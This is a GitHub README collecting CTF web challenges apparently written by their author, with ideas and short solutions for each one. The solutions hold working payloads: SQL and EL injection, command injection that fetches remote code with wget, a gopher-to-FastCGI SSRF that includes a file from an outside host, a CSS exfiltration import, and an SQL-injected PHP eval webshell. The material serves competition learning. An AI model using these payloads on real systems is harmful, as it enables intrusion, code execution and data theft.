Collection of CTF Web challenges I made
PHP HTML Java ApacheConf Python CSS Other
Latest commit 2f3fc56 Oct 16, 2016 Orange Tsai add writeups
Permalink
Failed to load latest commit information.
ais3-final-2015/sqlpwn Initial commit Aug 1, 2016
hitcon-ctf-2014 Initial commit Aug 1, 2016
hitcon-ctf-2015 WCTF BlackBox added Aug 1, 2016
hitcon-ctf-2016 add %%% config Oct 13, 2016
wctf-2016/BlackBox WCTF BlackBox added Aug 1, 2016
README.md add writeups Oct 15, 2016

README.md

My CTF Web Challenges

Hi, I am Orange. This is the repo of CTF challenges I made. It contains challs's source code, writeup and some idea explanation.

I am a CTFer and Bug Bounty Hunter, loving web hacking and penetration testing. So you will see these challs are all about web. If you have any question about these challs, you can find me in following ways  


Hope you will like it :)  

P.s. By the way, Babyfirst is my favorite one in all of these challenges, if you don't have time to see all, please look it at lease!

Table of Content


papapa

Difficulty:
Sovled: 71 / 1024
Tag: BlackBox, SSL, Pentesting

Idea:

  • Use SSL certificate to leak internal hostname

Source Code

Solution

$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternativer Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org
...
# get flag
$ curl -k  -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/

Write Ups

Leaking

Difficulty: ★★
Sovled: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS

Idea:

Source Code

Solution

$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;

Write Ups

BabyTrick

Difficulty: ★★★
Sovled: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize

Idea:

Source Code

Solution

# get password
curl http://1.2.3.4/
?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}

# get flag
curl http://1.2.3.4/
?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}

Write Ups

Angry Boy

Difficulty: ★★☆
Sovled: 43 / 1024
Tag: GrayBox, Java

Idea:

Source Code

Solution

Write Ups

Angry Seam

Difficulty: ★★★★
Sovled: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization

Idea:

Source Code

Solution


P.s. I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P

Intended solution

  • Register an account

    username: `AAAAAA`    
    password: `AAAAAA`  
    realname: `{/*';*/}%0a@import'http://orange.tw/?`  
    
  • Report URL

    http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA
    


Unintended solution

  • Register an account
  • Update description to

    /?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
    
  • Login and access

    GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
    host: 1.2.3.4
    cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
    ccc: ls -alh
    ...
    


Unintended solution

  • CVE-2013-2165 Java deserialization vulnerability


Unintended solution

  • SESSION manipulation... seam SUCKS

Write Ups

Babyfirst

Sovled: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection

Idea

  • Use NewLine to bypass regular expression check
  • Command injection only with alphanumeric characters

Source Code

  • here

    <?php
    highlight_file(__FILE__);
    
    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);
    
    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) )
            exit();
    }
    
    exec("/bin/orange " . implode(" ", $args));
    ?>

Solution

http://localhost/
?args[0]=x%0a
&args[1]=mkdir
&args[2]=orange%0a
&args[3]=cd
&args[4]=orange%0a
&args[5]=wget
&args[6]=846465263%0a

http://localhost/
?args[0]=x%0a
&args[1]=tar
&args[2]=cvf
&args[3]=aa
&args[4]=orange%0a
&args[5]=php
&args[6]=aa

And there are also lots of creative solutions, you can check the write ups below.

Write Ups

nanana

Difficulty: ★★★
Sovled: 18 / 969
Tag: GrayBox, C, PWN

Idea:

  • Pwn without library
  • Format String without output
  • Bypass Stack Guard by using overflow ARGV[1]

Source Code

Solution

Write Ups

Giraffe's Coffee

Difficulty: ★★★☆
Sovled: 16 / 969
Tag: WhiteBox, PHP

Idea:

  • Break PHP PRNG
  • Break shared PRNG STATE in Apache Prefork mode

Source Code

Solution

TBD

Write Ups

lalala

Difficulty: ★★★☆
Sovled: 2 / 969
Tag: BlackBox, PHP, SSRF

Idea:

  • Bypass SSRF restrictiton with 302 redirect
  • Exploit FASTCGI protocol by using GOPHER

Source Code

Solution

<?php
header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );

Write Ups

Use-After-FLEE

Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN

Idea

Source Code

Solution

TBD

Write Ups

PUSHIN CAT

Solved: 8 / 1020
Difficulty: ★★
Platform: BlackBox, PHP, H2, SQL Injection

Idea

  • SQL Injection on H2 Database
  • Execute Code by using H2 SQL Injection  

Source Code

Solution

TBD

Write Ups

PY4H4SHER

Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP

Idea

Source Code

Solution

TBD  

Write Ups

LEENODE

Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache

Idea

  • Multilayered architecture vulnerability
  • Double Encoding

Source Code

Solution

# get password
$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm

# get flag
$ curl http://1.2.3.4/admin/thefl4g.txt 

Write Ups

BlackBox

Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF

Idea

  • Multilayered architecture vulnerability
  • Default and up to date mod_jk leads to directory travesal
  • Bypass WAF by incorrect usage of BASE64 and URLENCODE
  • SQL Injection on H2 Database
  • Execute Code by using H2 SQL Injection  

Source Code

Solution

  • Get source code

    http://1.2.3.4/login/..;/
    
  • Review code and find a way to bypass WAF

    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"
    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
  • Write shell

    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"
    $ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'

Write Ups

TBD

SQLPWN

Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection, LFI, Race Condition

Idea

  • One-byte off SQL Injection
  • Race Condition
  • Local file inclusion with PHP session

Source Code

Solution

  • Run exploit.py to win race condition

  • Login and SQL Injection

    $ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\&note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'
  • Local file inclusion with session

    $ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220

Write Ups